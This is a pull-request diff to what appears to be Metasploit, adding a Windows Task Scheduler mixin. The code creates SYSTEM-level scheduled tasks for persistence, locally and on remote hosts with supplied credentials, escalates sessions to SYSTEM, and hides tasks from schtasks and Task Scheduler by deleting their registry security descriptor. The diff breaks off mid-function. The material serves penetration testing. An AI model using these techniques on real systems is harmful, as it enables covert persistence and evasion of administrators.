### PR TITLE
Windows Task Scheduler Mixin & `persistence_exe`  and `vss_persistence` module update

### DIFF
--- a/lib/msf/core/post/common.rb
+++ b/lib/msf/core/post/common.rb
@@ -258,7 +258,11 @@ module Msf::Post::Common
   # @param [Integer] timeout The time in sec. to wait before giving up
   # @param [Hash] opts An Hash of options (see {#cmd_exec})
   # @return [Array(String, Boolean)] Array containing the output string
-  #   followed by a boolean indicating if the command succeded or not
+  #   followed by a boolean indicating if the command succeeded or not. When
+  #   this boolean is `true`, the first field contains the normal command
+  #   output. When it is `false`, the first field contains the error message
+  #   returned by the command or a timeout error message if the timeout
+  #   expired.
   def cmd_exec_with_result(cmd, args = nil, timeout = 15, opts = {})
     # This token will be returned if the command succeeds.
     # Redirection operators (`&&` and `||`) are the most reliable methods to

--- a/lib/msf/core/post/windows/task_scheduler.rb
+++ b/lib/msf/core/post/windows/task_scheduler.rb
@@ -1,0 +1,226 @@
+# -*- coding: binary -*-
+
+module Msf
+  class Post
+    module Windows
+      #
+      # Post module mixin for dealing with Windows Task Scheduler
+      #
+      module TaskScheduler # rubocop:disable Metrics/ModuleLength
+        include ::Msf::Post::Common
+
+        class TaskSchedulerError < StandardError; end
+
+        TASK_REG_KEY = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree'.freeze
+        TASK_SD_REG_VALUE = 'SD'.freeze
+        # This Security Descriptor is for builtin 'Guest' user and built-in 'Guests'
+        # group. This has been generated from the following security descriptor
+        # string: "O:BGG:BG"
+        DEFAULT_SD = "\x01\x00\x00\x80\x14\x00\x00\x00\x24\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"\
+                     "\x01\x02\x00\x00\x00\x00\x00\x05\x20\x00\x00\x00\x22\x02\x00\x00\x01\x02\x00\x00"\
+                     "\x00\x00\x00\x05\x20\x00\x00\x00\x22\x02\x00\x00".freeze
+
+        def initialize(info = {})
+          super
+
+          register_advanced_options(
+            [
+              OptEnum.new(
+                'ScheduleType', [
+                  true,
+                  'Schedule frequency for the new created task.',
+                  'ONSTART',
+                  %w[MINUTE HOURLY DAILY WEEKLY MONTHLY ONCE ONSTART ONLOGON ONIDLE]
+                ]
+              ),
+              OptInt.new(
+                'ScheduleModifier', [
+                  false,
+                  'Schedule frequency modifier. This defines the amount of minutes/hours/days/weeks/months,'\
+                  ' depending on the ScheduleType value. When ONIDLE type is used, this represents how many'\
+                  ' minutes the computer is idle before the task starts. This value is not used with ONCE, '\
+                  'ONSTART and ONLOGON types.',
+                  1
+                ]
+              ),
+              OptString.new(
+                'ScheduleRemoteSystem', [
+                  false,
+                  'The remote system to connect to. Use a FQDN to avoid long delays due to automatic DNS resolutions.'
+                ]
+              ),
+              OptString.new(
+                'ScheduleUsername', [
+                  false,
+                  'Use the permissions of this remote user account to schedule the task remotely (e.g. '\
+                  'MYDOMAIN\User1 or .\Administrator). This requires \'ScheduleRemoteSystem\' to be set.'
+                ]
+              ),
+              OptString.new(
+                'SchedulePassword', [
+                  false,
+                  'Password of the remote user account set in \'ScheduleUsername\'. This requires '\
+                  '\'ScheduleUsername\' and \'ScheduleRemoteSystem\' to be set.'
+                ]
+              ),
+              OptString.new(
+                'ScheduleRunAs', [
+                  false,
+                  'Execute the task under this user account (default: SYSTEM).',
+                  'SYSTEM'
+                ]
+              ),
+              OptBool.new(
+                'ObfuscateTask', [
+                  false,
+                  'Hide the task from "schtasks /query" and Task Scheduler by deleting the '\
+                  'associated Security Descriptor registry value. Note that SYSTEM privileges '\
+                  'are needed for this. It will try to elevate privileges if the session is not '\
+                  'already running under the SYSTEM user.',
+                  true
+                ]
+              )
+            ], self.class
+          )
+        end
+
+        def get_schtasks_cmd_string(schtasks_cmd, opts = {})
+          schtasks_cmd.prepend('schtasks')
+          system = opts[:remote_system] || datastore['ScheduleRemoteSystem']
+          schtasks_cmd += ['/s', system] if system
+          username = opts[:username] || datastore['ScheduleUsername']
+          schtasks_cmd += ['/u', username] if username
+          password = opts[:password] || datastore['SchedulePassword']
+          schtasks_cmd += ['/p', password] if password
+          schtasks_cmd.join(' ')
+        end
+
+        def schtasks_exec(schtasks_cmd_str)
+          dlog("[Task Scheduler] execute command: #{schtasks_cmd_str}")
+          # Using a longer timeout in case the task scheduler operation takes place
+          # on a remote host. The default timeout is not enough.
+          result = cmd_exec(schtasks_cmd_str, nil, 120)
+          unless result.include?('SUCCESS:')
+            raise TaskSchedulerError, "Could not executing command '#{schtasks_cmd_str}'. Error: #{result}"
+          end
+        end
+
+        def execute_cmd(cmd)
+          verification_token = Rex::Text.rand_text_alphanumeric(8)
+          result = cmd_exec("cmd /c #{cmd} & if not errorlevel 1 echo #{verification_token}")
+          result.include?(verification_token)
+        end
+
+        def delete_reg_key_value(reg_key, reg_value)
+          dlog('[Task Scheduler] Remove the Security Descriptor registry key value to hide the task')
+
+          unless is_system?
+            dlog('[Task Scheduler] Try to get SYSTEM privilege')
+            results = session.priv.getsystem
+            if results[0]
+              dlog('[Task Scheduler] Got SYSTEM privilege')
+            else
+              raise TaskSchedulerError, 'Could not obtain SYSTEM privilege, which is needed to delete the key value.'
+            end
+          end
+
+          remote_host = datastore['ScheduleRemoteSystem']
+          dlog("[Task Scheduler] Deleting #{reg_value} in #{reg_key}#{" on remote host #{remote_host}" if remote_host}")
+          if remote_host
+            task_name = Rex::Text.rand_text_alpha(rand(8..15))
+            begin
+              dlog("[Task Scheduler] Creating the remote task #{task_name} to run 'reg delete'")
+              opts = { task_type: 'ONCE', runas: 'SYSTEM', obfuscate: false }
+              task_cmd = "reg delete \\\"#{reg_key}\\\" /v \\\"#{reg_value}\\\" /f"
+              task_create(task_name, task_cmd, opts)
+            rescue TaskSchedulerError => e
+              dlog("[Task Scheduler] Error while creating a remote task to delete the registry key value: #{e}")
+              raise
+            end
+            begin
+              dlog("[Task Scheduler] Starting the remote task #{task_name}")
+              task_start(task_name)
+            rescue TaskSchedulerError => e
+              dlog("[Task Scheduler] Error while starting the task to delete the registry key value: #{e}")
+              raise
+            end
+            begin
+              dlog("[Task Scheduler] Delete the remote task #{task_name}")
+              task_delete(task_name, { obfuscate: false })
+            rescue TaskSchedulerError => e
+              dlog("[Task Scheduler] Error while starting the task to delete the registry key value: #{e}")
+              raise
+            end
+          else
+            unless registry_deleteval(reg_key, reg_value)
+              raise TaskSchedulerError, 'Could not delete the key value.'
+            end
+          end
+        end
+
+        def task_create(task_name, task_cmd, opts = {})
+          schtasks_cmd = ['/create']
+          task_type = opts[:task_type] || datastore['ScheduleType']
+          schtasks_cmd += ['/tn', "\"#{task_name}\"", '/tr', "\"#{task_cmd}\"", '/sc', task_type, '/f']
+          if %w[MINUTE HOURLY DAILY WEEKLY MONTHLY ONIDLE].include?(task_type)
+            modifier = opts[:modifier] || datastore['ScheduleModifier'].to_s
+            schtasks_cmd += ['/mo', modifier]
+          end
+          schtasks_cmd += ['/st', '00:00:00'] if task_type == 'ONCE'
+          runas = opts[:runas] || datastore['ScheduleRunAs'] || 'SYSTEM'
+          schtasks_cmd += ['/ru', runas]
+
+          begin
+            schtasks_exec(get_schtasks_cmd_string(schtasks_cmd, opts))
+          rescue TaskSchedulerError => e
+            dlog("[Task Scheduler] Task creation failed: #{e}")
+            raise
+          end
+
+          # We want to make sure `opts` has preference over the datastore option
+          if opts[:obfuscate].nil?
+            return unless datastore['ObfuscateTask']
+          else
+            return unless opts[:obfuscate]
+          end
+
+          begin
+            delete_reg_key_value("#{TASK_REG_KEY}\\#{task_name}", TASK_SD_REG_VALUE)
+          rescue TaskSchedulerError => e
+            dlog("[Task Scheduler] Task obfuscation failed: #{e}")
+            raise TaskSchedulerError, "Task obfuscation failed (the task has been created but won\'t be hidden): #{e}"
+          end
+        end
+
+        def task_start(task_name, opts = {})
+          schtasks_cmd = ['/run', '/tn', task_name, '/i']
+          schtasks_exec(get_schtasks_cmd_string(schtasks_cmd, opts))
+        end
+
+        def task_delete(task_name, opts = {})
+          # We want to make sure `opts` has preference over the datastore option
+          if opts[:obfuscate].nil? && datastore['ObfuscateTask'] ||
+             !opts[:obfuscate].nil? && opts[:obfuscate]
+            unless is_system?
+              dlog('[Task Scheduler] Trying to get SYSTEM privilege')
+              results = session.priv.getsystem
+              if results[0]
+                dlog('[Task Scheduler] Got SYSTEM privilege')
+              else
+                dlog('[Task Scheduler] Could not obtain SYSTEM privilege')
+                return false
+              end
+            end
+
+            dlog('[Task Scheduler] Restoring registry key value')
+            result = registry_setvaldata("#{TASK_REG_KEY}\\#{task_name}", TASK_SD_REG_VALUE, DEFAULT_SD, 'REG_BINARY')
+            return false if result.nil? || !result
+          end
+
+          schtasks_cmd = ['/delete', '/tn', task_name, '/f']
+          schtasks_exec(get_schtasks_cmd_string(schtasks_cmd, opts))
+        end
+      end
+    end
+  end
+end

--- a/lib/msf/core/post/windows/task_scheduler.rb
+++ b/lib/msf/core/post/windows/task_scheduler.rb
@@ -8,17 +8,24 @@ module Msf
       #
       module TaskScheduler # rubocop:disable Metrics/ModuleLength
         include ::Msf::Post::Common
+        include ::Msf::Post::Windows::Priv
+        include ::Msf::Module::UI::Message
 
         class TaskSchedulerError < StandardError; end
+        class TaskSchedulerObfuscationError < TaskSchedulerError; end
+        class TaskSchedulerSystemPrivsError < TaskSchedulerError; end
 
         TASK_REG_KEY = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree'.freeze
+        # Security descriptor value
         TASK_SD_REG_VALUE = 'SD'.freeze
-        # This Security Descriptor is for builtin 'Guest' user and built-in 'Guests'
-        # group. This has been generated from the following security descriptor
-        # string: "O:BGG:BG"
-        DEFAULT_SD = "\x01\x00\x00\x80\x14\x00\x00\x00\x24\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"\
-                     "\x01\x02\x00\x00\x00\x00\x00\x05\x20\x00\x00\x00\x22\x02\x00\x00\x01\x02\x00\x00"\
-                     "\x00\x00\x00\x05\x20\x00\x00\x00\x22\x02\x00\x00".freeze
+        # This Security Descriptor correspond to the builtin 'Guest' user and
+        # built-in 'Guests' group. This has been generated from the following
+        # security descriptor string: "O:BGG:BG"
+        DEFAULT_SD = '01000080140000002400000000000000000000000102000000000005200000002202000001020000000000052000000022020000'.freeze
+        # HRESULT returned in the field `Last Result` by `schtasks /query` when
+        # the task is currently running (see
+        # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/705fb797-2175-4a90-b5a3-3918024b10b8)
+        SCHED_S_TASK_RUNNING = 0x00041301
 
         def initialize(info = {})
           super
@@ -33,35 +40,45 @@ module Msf
                   %w[MINUTE HOURLY DAILY WEEKLY MONTHLY ONCE ONSTART ONLOGON ONIDLE]
                 ]
               ),
+              # This defines the amount of minutes/hours/days/weeks/months,
+              # depending on the ScheduleType value. When ONIDLE type is used,
+              # this represents how many minutes the computer is idle before
+              # the task starts. This value is not used with ONCE, ONSTART and
+              # ONLOGON types
               OptInt.new(
                 'ScheduleModifier', [
                   false,
-                  'Schedule frequency modifier. This defines the amount of minutes/hours/days/weeks/months,'\
-                  ' depending on the ScheduleType value. When ONIDLE type is used, this represents how many'\
-                  ' minutes the computer is idle before the task starts. This value is not used with ONCE, '\
-                  'ONSTART and ONLOGON types.',
+                  'Schedule frequency modifier to define the amount of \'ScheduleType\'',
                   1
-                ]
+                ],
+                conditions: ['ScheduleType', 'in', %w[MINUTE HOURLY DAILY WEEKLY MONTHLY ONIDLE] ]
               ),
+              # Remote task creation does not seem to work on Windows XP and Windows Server 2003
               OptString.new(
                 'ScheduleRemoteSystem', [
                   false,
-                  'The remote system to connect to. Use a FQDN to avoid long delays due to automatic DNS resolutions.'
+                  'The remote system to connect to (prefer FQDN to IP). Not compatible with Windows XP/Server 2003.'
                 ]
               ),
+              # Use the permissions of this remote user account to schedule the
+              # task remotely. It is recommended to inform the domain or '.\'
+              # if it is a local user (e.g. MYDOMAIN\User1 or .\Administrator).
+              # Also, when `ScheduleRemoteSystem` is set and not
+              # `ScheduleUsername` and `SchedulePassword`, the current user
+              # credentials are used.
               OptString.new(
                 'ScheduleUsername', [
                   false,
-                  'Use the permissions of this remote user account to schedule the task remotely (e.g. '\
-                  'MYDOMAIN\User1 or .\Administrator). This requires \'ScheduleRemoteSystem\' to be set.'
-                ]
+                  'User account to schedule the task remotely.'
+                ],
+                conditions: ['ScheduleRemoteSystem', 'nin', [nil, '']]
               ),
               OptString.new(
                 'SchedulePassword', [
                   false,
-                  'Password of the remote user account set in \'ScheduleUsername\'. This requires '\
-                  '\'ScheduleUsername\' and \'ScheduleRemoteSystem\' to be set.'
-                ]
+                  'Password of the user account set in \'ScheduleUsername\'.'
+                ],
+                conditions: ['ScheduleRemoteSystem', 'nin', [nil, '']]
               ),
               OptString.new(
                 'ScheduleRunAs', [
@@ -70,13 +87,16 @@ module Msf
                   'SYSTEM'
                 ]
               ),
+              # Hide the task from "schtasks /query" and Task Scheduler by
+              # deleting the associated Security Descriptor registry value.
+              # Note that SYSTEM privileges are needed for this. It will try to
+              # elevate privileges if the session is not already running under
+              # the SYSTEM user.',
               OptBool.new(
-                'ObfuscateTask', [
+                'ScheduleObfuscateTask', [
                   false,
-                  'Hide the task from "schtasks /query" and Task Scheduler by deleting the '\
-                  'associated Security Descriptor registry value. Note that SYSTEM privileges '\
-                  'are needed for this. It will try to elevate privileges if the session is not '\
-                  'already running under the SYSTEM user.',
+                  'Hide the task from "schtasks /query" and Task Scheduler (WARNING: the current '\
+                  'session will be elevated to SYSTEM if it is not already) for this.',
                   true
                 ]
               )
@@ -84,141 +104,393 @@ module Msf
           )
         end
 
-        def get_schtasks_cmd_string(schtasks_cmd, opts = {})
-          schtasks_cmd.prepend('schtasks')
-          system = opts[:remote_system] || datastore['ScheduleRemoteSystem']
-          schtasks_cmd += ['/s', system] if system
-          username = opts[:username] || datastore['ScheduleUsername']
-          schtasks_cmd += ['/u', username] if username
-          password = opts[:password] || datastore['SchedulePassword']
-          schtasks_cmd += ['/p', password] if password
-          schtasks_cmd.join(' ')
+        def setup
+          super
+          check_compatibility
         end
 
-        def schtasks_exec(schtasks_cmd_str)
-          dlog("[Task Scheduler] execute command: #{schtasks_cmd_str}")
-          # Using a longer timeout in case the task scheduler operation takes place
-          # on a remote host. The default timeout is not enough.
-          result = cmd_exec(schtasks_cmd_str, nil, 120)
-          unless result.include?('SUCCESS:')
-            raise TaskSchedulerError, "Could not executing command '#{schtasks_cmd_str}'. Error: #{result}"
-          end
-        end
-
-        def execute_cmd(cmd)
-          verification_token = Rex::Text.rand_text_alphanumeric(8)
-          result = cmd_exec("cmd /c #{cmd} & if not errorlevel 1 echo #{verification_token}")
-          result.include?(verification_token)
-        end
-
-        def delete_reg_key_value(reg_key, reg_value)
-          dlog('[Task Scheduler] Remove the Security Descriptor registry key value to hide the task')
-
-          unless is_system?
-            dlog('[Task Scheduler] Try to get SYSTEM privilege')
-            results = session.priv.getsystem
-            if results[0]
-              dlog('[Task Scheduler] Got SYSTEM privilege')
-            else
-              raise TaskSchedulerError, 'Could not obtain SYSTEM privilege, which is needed to delete the key value.'
-            end
-          end
-
-          remote_host = datastore['ScheduleRemoteSystem']
-          dlog("[Task Scheduler] Deleting #{reg_value} in #{reg_key}#{" on remote host #{remote_host}" if remote_host}")
-          if remote_host
-            task_name = Rex::Text.rand_text_alpha(rand(8..15))
-            begin
-              dlog("[Task Scheduler] Creating the remote task #{task_name} to run 'reg delete'")
-              opts = { task_type: 'ONCE', runas: 'SYSTEM', obfuscate: false }
-              task_cmd = "reg delete \\\"#{reg_key}\\\" /v \\\"#{reg_value}\\\" /f"
-              task_create(task_name, task_cmd, opts)
-            rescue TaskSchedulerError => e
-              dlog("[Task Scheduler] Error while creating a remote task to delete the registry key value: #{e}")
-              raise
-            end
-            begin
-              dlog("[Task Scheduler] Starting the remote task #{task_name}")
-              task_start(task_name)
-            rescue TaskSchedulerError => e
-              dlog("[Task Scheduler] Error while starting the task to delete the registry key value: #{e}")
-              raise
-            end
-            begin
-              dlog("[Task Scheduler] Delete the remote task #{task_name}")
-              task_delete(task_name, { obfuscate: false })
-            rescue TaskSchedulerError => e
-              dlog("[Task Scheduler] Error while starting the task to delete the registry key value: #{e}")
-              raise
-            end
-          else
-            unless registry_deleteval(reg_key, reg_value)
-              raise TaskSchedulerError, 'Could not delete the key value.'
-            end
-          end
-        end
-
+        #
+        # Create a scheduled task on a local or remote system.
+        # Options are set from the datastore but can be overridden with the +opts+ hash.
+        #
+        # @param [String] task_name The name of the task to be created
+        # @param [String] task_cmd The command that will be executed by the task
+        # @param [Hash] opts The options to create the task
+        # @option opts [String] :task_type The schedule frequency for the new
+        #   created task. This can be one of these type: MINUTE HOURLY DAILY
+        #   WEEKLY MONTHLY ONCE ONSTART ONLOGON ONIDLE.
+        # @option opts [String] :modifier The schedule frequency modifier to define the amount of +:task_type+
+        # @option opts [String] :runas The account under which the task will be executed
+        # @option opts [Boolean] :obfuscate When set to true, the task will be
+        #   hidden from "schtasks /query" and Task Scheduler when the OS support
+        #   it. The current session will be elevated to SYSTEM if it is not
+        #   already
+        # @option opts [String] :remote_system The remote system to connect to
+        #   (prefer FQDN to IP). Not compatible with Windows XP/Server 2003.
+        # @option opts [String] :username The user account to schedule the task remotely
+        # @option opts [String] :password The password of the user account set in +:username+
         def task_create(task_name, task_cmd, opts = {})
           schtasks_cmd = ['/create']
           task_type = opts[:task_type] || datastore['ScheduleType']
-          schtasks_cmd += ['/tn', "\"#{task_name}\"", '/tr', "\"#{task_cmd}\"", '/sc', task_type, '/f']
+          schtasks_cmd += ['/tn', "\"#{task_name}\"", '/tr', "\"#{task_cmd}\"", '/sc', task_type]
           if %w[MINUTE HOURLY DAILY WEEKLY MONTHLY ONIDLE].include?(task_type)
             modifier = opts[:modifier] || datastore['ScheduleModifier'].to_s
             schtasks_cmd += ['/mo', modifier]
           end
-          schtasks_cmd += ['/st', '00:00:00'] if task_type == 'ONCE'
-          runas = opts[:runas] || datastore['ScheduleRunAs'] || 'SYSTEM'
+          schtasks_cmd += ['/st', '00:00:00']
+          runas = opts[:runas] || (datastore['ScheduleRunAs'].present? ? datastore['ScheduleRunAs'] : 'SYSTEM')
           schtasks_cmd += ['/ru', runas]
+          schtasks_cmd << '/f' unless @old_schtasks
 
           begin
             schtasks_exec(get_schtasks_cmd_string(schtasks_cmd, opts))
           rescue TaskSchedulerError => e
-            dlog("[Task Scheduler] Task creation failed: #{e}")
+            log_and_print("[Task Scheduler] Task creation failed: #{e}", level: :error)
             raise
           end
 
           # We want to make sure `opts` has preference over the datastore option
           if opts[:obfuscate].nil?
-            return unless datastore['ObfuscateTask']
+            return unless datastore['ScheduleObfuscateTask']
           else
             return unless opts[:obfuscate]
           end
 
           begin
             delete_reg_key_value("#{TASK_REG_KEY}\\#{task_name}", TASK_SD_REG_VALUE)
-          rescue TaskSchedulerError => e
-            dlog("[Task Scheduler] Task obfuscation failed: #{e}")
-            raise TaskSchedulerError, "Task obfuscation failed (the task has been created but won\'t be hidden): #{e}"
+          rescue TaskSchedulerObfuscationError => e
+            log_and_print("[Task Scheduler] Task obfuscation failed: #{e}")
+            raise TaskSchedulerObfuscationError, 'Task obfuscation failed (the task has been created but won\'t be hidden)'
           end
         end
 
+        #
+        # Immediately run a scheduled task.
+        # Options are set from the datastore but can be overridden with the +opts+ hash.
+        #
+        # @param [String] task_name The name of the task to be run
+        # @param [Hash] opts The options to run the task
+        # @option opts [String] :remote_system The remote system to connect to
+        #   (prefer FQDN to IP). Not compatible with Windows XP/Server 2003.
+        # @option opts [String] :username The user account to run the task remotely
+        # @option opts [String] :password The password of the user account set in +:username+
         def task_start(task_name, opts = {})
-          schtasks_cmd = ['/run', '/tn', task_name, '/i']
+          schtasks_cmd = ['/run', '/tn', task_name]
           schtasks_exec(get_schtasks_cmd_string(schtasks_cmd, opts))
+        rescue TaskSchedulerError => e
+          log_and_print("[Task Scheduler] Task starting failed: #{e}", level: :error)
+          raise
         end
 
+        #
+        # Delete a scheduled task.
+        # Options are set from the datastore but can be overridden with the +opts+ hash.
+        #
+        # @param [String] task_name The name of the task to be deleted
+        # @param [Hash] opts The options to delete the task
+        # @option opts [Boolean] :obfuscate If the scheduled task has been
+        #   obfuscated (see #task_create), this must be set to true. This will
+        #   ensure the obfuscation is reverted before attempting to delete the
+        #   task. The system is unable to delete a task that is hidden.
+        # @option opts [String] :remote_system The remote system to connect to
+        #   (prefer FQDN to IP). Not compatible with Windows XP/Server 2003.
+        # @option opts [String] :username The user account to run the task remotely
+        # @option opts [String] :password The password of the user account set in +:username+
         def task_delete(task_name, opts = {})
           # We want to make sure `opts` has preference over the datastore option
-          if opts[:obfuscate].nil? && datastore['ObfuscateTask'] ||
-             !opts[:obfuscate].nil? && opts[:obfuscate]
-            unless is_system?
-              dlog('[Task Scheduler] Trying to get SYSTEM privilege')
-              results = session.priv.getsystem
-              if results[0]
-                dlog('[Task Scheduler] Got SYSTEM privilege')
-              else
-                dlog('[Task Scheduler] Could not obtain SYSTEM privilege')
-                return false
-              end
+          if (opts[:obfuscate].nil? && datastore['ScheduleObfuscateTask']) ||
+             (!opts[:obfuscate].nil? && opts[:obfuscate])
+            begin
+              add_reg_key_value("#{TASK_REG_KEY}\\#{task_name}", TASK_SD_REG_VALUE, DEFAULT_SD, 'REG_BINARY')
+            rescue TaskSchedulerObfuscationError => e
+              log_and_print("[Task Scheduler] Task deletion failed: #{e}")
+              raise TaskSchedulerError, 'Task deobfuscation failed. The task cannot be deleted.'
             end
-
-            dlog('[Task Scheduler] Restoring registry key value')
-            result = registry_setvaldata("#{TASK_REG_KEY}\\#{task_name}", TASK_SD_REG_VALUE, DEFAULT_SD, 'REG_BINARY')
-            return false if result.nil? || !result
           end
 
           schtasks_cmd = ['/delete', '/tn', task_name, '/f']
           schtasks_exec(get_schtasks_cmd_string(schtasks_cmd, opts))
+        rescue TaskSchedulerError => e
+          log_and_print("[Task Scheduler] Task deletion failed: #{e}", level: :error)
+          raise
+        end
+
+        #
+        # Display the scheduled task information.
+        # Options are set from the datastore but can be overridden with the +opts+ hash.
+        #
+        # @param [String] task_name The name of the task to be display
+        # @param [Hash] opts The options to display the task
+        # @option opts [String] :remote_system The remote system to connect to
+        #   (prefer FQDN to IP). Not compatible with Windows XP/Server 2003.
+        # @option opts [String] :username The user account to run the task remotely
+        # @option opts [String] :password The password of the user account set in +:username+
+        def task_query(task_name, opts = {})
+          if @old_os
+            schtasks_cmd = ['/query', '/v', '/fo', 'csv']
+          else
+            schtasks_cmd = ['/query', '/tn', task_name, '/v', '/fo', 'csv', '/hresult']
+          end
+          schtasks_exec(get_schtasks_cmd_string(schtasks_cmd, opts), with_result: true)
+        rescue TaskSchedulerError => e
+          log_and_print("[Task Scheduler] Task querying failed: #{e}", level: :error)
+          raise
+        end
+
+        #
+        # Module functions that are made private to classes that mix on this module
+        #
+
+        module_function
+
+        def check_compatibility
+          # Check Windows version to make sure we will use the correct supported command flags
+          # - `schtasks.exe` on Windows prior to Windows Server 2003 SP2 (5.2 build 3959)
+          #   has some different `/create` option flags.
+          # - `schtasks.exe` on Windows until Server 2003 SP2 (5.2 build 3959)
+          #   has some different `/query` option flags. Also, on these OS,
+          #   `reg.exe` does not support the `/reg:64` flag.
+          @old_schtasks = false
+          @old_os = false
+          match = sysinfo['OS'].match(/(?<version>[\d.]+) Build (?<build>\d+)/)
+          return unless match
+
+          version = Rex::Version.new("#{match[:version]}.#{match[:build]}")
+          latest_win2003_build = Rex::Version.new('5.2.3959')
+          @old_schtasks = version < latest_win2003_build
+          @old_os = version <= latest_win2003_build
+          if @old_os && datastore['ScheduleRemoteSystem'].present?
+            log_and_print(
+              '[Task Scheduler] This OS version does not support remote schedule tasks. This is likely to fail.',
+              level: :warning
+            )
+          end
+        end
+
+        def log_and_print(msg, level: :debug)
+          case level
+          when :debug
+            vprint_status(msg) if respond_to?(:vprint_status)
+            dlog(msg)
+          when :status
+            vprint_status(msg) if respond_to?(:vprint_status)
+            ilog(msg)
+          when :warning
+            vprint_warning(msg) if respond_to?(:vprint_warning)
+            wlog(msg)
+          when :error
+            vprint_error(msg) if respond_to?(:vprint_error)
+            elog(msg)
+          end
+        end
+
+        def get_schtasks_cmd_string(schtasks_cmd, opts = {})
+          cmd = schtasks_cmd.dup
+          cmd.prepend('schtasks')
+          system = opts[:remote_system] || (datastore['ScheduleRemoteSystem'].present? ? datastore['ScheduleRemoteSystem'] : nil)
+          cmd += ['/s', system] if system
+          username = opts[:username] || (datastore['ScheduleUsername'].present? ? datastore['ScheduleUsername'] : nil)
+          cmd += ['/u', username] if username
+          password = opts[:password] || (datastore['SchedulePassword'].present? ? datastore['SchedulePassword'] : nil)
+          cmd += ['/p', password] if password
+          cmd.join(' ')
+        end
+
+        def schtasks_exec(schtasks_cmd_str, with_result: false)
+          log_and_print("[Task Scheduler] execute command: #{schtasks_cmd_str}")
+          # Using a longer timeout in case the task scheduler operation takes place
+          # on a remote host. The default timeout is not enough.
+          result = cmd_exec_with_result(schtasks_cmd_str, nil, 240)
+          return result if with_result
+          unless result[1]
+            raise TaskSchedulerError, "Command execution failed: #{result[0]}"
+          end
+        end
+
+        def get_system_privs
+          return if is_system?
+
+          unless session.type == 'meterpreter'
+            error = "Incompatible session type (#{session.type}), cannot get SYSTEM "\
+                    'privileges to obfuscate the scheduled task.'
+            log_and_print("[Task Scheduler] #{error}", level: :error)
+            raise TaskSchedulerSystemPrivsError, error
+          end
+          unless session.ext.priv
+            error = 'This Meterpreter session does not support `priv` extension, cannot '\
+                    'get SYSTEM privileges to obfuscate the scheduled task.'
+            log_and_print("[Task Scheduler] #{error}", level: :error)
+            raise TaskSchedulerSystemPrivsError, error
+          end
+          log_and_print('[Task Scheduler] Trying to get SYSTEM privilege')
+          results = session.priv.getsystem
+          if results[0]
+            log_and_print('[Task Scheduler] Got SYSTEM privilege')
+          else
+            raise TaskSchedulerSystemPrivsError
+          end
+        end
+
+        def task_info_field(task_name, task_info, key)
+          task_name = task_name.delete_prefix('"').delete_suffix('"')
+          key = key.delete_prefix('"').delete_suffix('"')
+          task_info = task_info.lines
+          title_array = task_info.shift&.split(',')
+          return unless title_array
+
+          index_taskname = title_array.find_index { |v| v == '"TaskName"' }
+          return unless index_taskname
+
+          index = title_array.find_index { |v| v == "\"#{key}\"" }
+          return unless index
+
+          task_info.each do |line|
+            value_array = line.split(',')
+            next unless value_array[index_taskname] == "\"\\#{task_name}\""
+
+            return value_array[index]&.delete_prefix('"')&.delete_suffix('"')
+          end
+          nil
+        end
+
+        def task_has_run?(task_name, task_info)
+          # Depending on the Windows version, the 'Last Run Time' field is set
+          # to '11/30/1999 12:00:00 AM' or 'N/A' when the task has not run yet
+          !['11/30/1999 12:00:00 AM', 'N/A'].include?(task_info_field(task_name, task_info, 'Last Run Time'))
+        end
+
+        def task_is_still_running?(task_name, task_info)
+          task_info_field(task_name, task_info, 'Last Result') == SCHED_S_TASK_RUNNING.to_s
+        end
+
+        def run_one_off_task(cmd, check_success: false)
+          result = nil
+          task_name = Rex::Text.rand_text_alpha(rand(8..15))
+          log_and_print("[Task Scheduler] Creating the remote task #{task_name} to run '#{cmd}'")
+          # Obfuscation is not possible since #run_one_off_task will be called
+          # again by #task_create when it checks if the registry key value
+          # exists. This will enter an infinite loop, creating tasks on the
+          # remote host until it explodes. We certainly don't want this to happen!
+          opts = { task_type: 'ONCE', runas: 'SYSTEM', obfuscate: false }
+          task_create(task_name, cmd, opts)
+
+          log_and_print("[Task Scheduler] Starting the remote task #{task_name}")
+          task_start(task_name)
+
+          if check_success
+            log_and_print('[Task Scheduler] Checking if the task succeeded')
+            result = false
+            try = 0
+            task_info = nil
+            has_run = loop do
+              break false unless try < 5
+
+              try += 1
+              log_and_print("[Task Scheduler] Checking if the task has run already (##{try})")
+              sleep 1
+              task_info = task_query(task_name)[0]
+              break true if task_has_run?(task_name, task_info) && !task_is_still_running?(task_name, task_info)
+            end
+            if has_run
+              # The result is '0' if it succeeded
+              last_result = task_info_field(task_name, task_info, 'Last Result')
+              result = last_result == '0'
+              if result
+                log_and_print('[Task Scheduler] It seems to have succeeded')
+              else
+                log_and_print("[Task Scheduler] It seems to have failed (0x#{last_result.to_i.to_s(16)})", level: :warning)
+              end
+            end
+          end
+
+          log_and_print("[Task Scheduler] Deleting the remote task #{task_name}")
+          task_delete(task_name, opts)
+
+          result
+        end
+
+        def reg_key_value_exists?(reg_key, reg_value, opts = {})
+          remote_host = opts[:remote_system].present? || datastore['ScheduleRemoteSystem'].present?
+          result = false
+          if remote_host
+            begin
+              result = run_one_off_task("reg query \\\"#{reg_key}\\\" /v \\\"#{reg_value}\\\"", check_success: true)
+            rescue TaskSchedulerError => e
+              log_and_print("[Task Scheduler] Could not query the key value remotely: #{e}")
+            end
+          else
+            # The `/reg:64` flag is here to force read/write to the 64-bit
+            # registry location. This is mandatory when the Meterpreter session
+            # is x86 and the OS is x64. Since it is ignored on 32-bit systems,
+            # we will always use it. Also, this option doesn't exist on Windows
+            # XP/Server 2003, we need to remove it or it will fail.
+            result = cmd_exec_with_result("reg query \"#{reg_key}\" /v \"#{reg_value}\"#{' /reg:64' unless @old_os}")[1]
+          end
+
+          result
+        end
+
+        def delete_reg_key_value(reg_key, reg_value)
+          log_and_print('[Task Scheduler] Remove the Security Descriptor registry key value to hide the task')
+
+          log_and_print('[Task Scheduler] Checking if the key value exists')
+          unless reg_key_value_exists?(reg_key, reg_value)
+            raise TaskSchedulerObfuscationError, "The #{reg_value} key value does not exist. Obfuscation is not possible"
+          end
+
+          begin
+            get_system_privs
+          rescue TaskSchedulerSystemPrivsError
